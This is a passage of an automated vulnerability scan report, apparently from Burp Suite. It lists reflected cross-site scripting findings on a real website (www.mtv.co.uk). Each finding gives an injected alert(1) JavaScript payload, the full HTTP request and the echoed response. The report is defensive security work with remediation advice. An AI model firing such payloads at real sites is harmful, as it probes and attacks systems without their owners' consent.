dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.103. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd3bd"-alert(1)-"d480e12847b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:52 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13447
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:52 GMT
Date: Mon, 12 Sep 2011 12:50:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttri
...[SNIP]...
2.104. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88542"-alert(1)-"d7718f9560d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:59 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13445
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:02 GMT
Date: Mon, 12 Sep 2011 12:51:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute
...[SNIP]...
2.105. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c5d"-alert(1)-"39abbfac80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:12 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:13 GMT
Date: Mon, 12 Sep 2011 12:51:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10
...[SNIP]...
2.106. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7899"-alert(1)-"456b488dfcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:51:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
g.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "
...[SNIP]...
2.107. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d010"-alert(1)-"bf7411a02bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:51:47 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:51:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:51:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...

com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.108. http://www.mtv.co.uk/sites/all/modules/mtv_videobrowse/mtv_videobrowse.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/mtv_videobrowse/mtv_videobrowse.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ac1"-alert(1)-"0a5748c1d7d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d?1274367484 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13437
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
);
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.109. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d83e"-alert(1)-"d0b389f7668 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668?1234890325 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.110. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus_default.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus_default.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b42df"-alert(1)-"7b9aaed79b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2?1309439822 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:01 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:02 GMT
Date: Mon, 12 Sep 2011 12:50:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.111. http://www.mtv.co.uk/sites/all/modules/top_tabs/top_tabs.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/top_tabs/top_tabs.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e58"-alert(1)-"5d8b7fc99da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da?1244458641 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13421
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
atcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.112. http://www.mtv.co.uk/sites/all/modules/user_optin/user_optin.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/user_optin/user_optin.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dbf9"-alert(1)-"7de6b6466d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6?1241187880 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.113. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/print.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/print.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b08dd"-alert(1)-"477bf834596 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596?1234890284 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13455
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.114. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/screen.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/screen.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e42"-alert(1)-"a0ad2d31b48 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48?1235581642 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
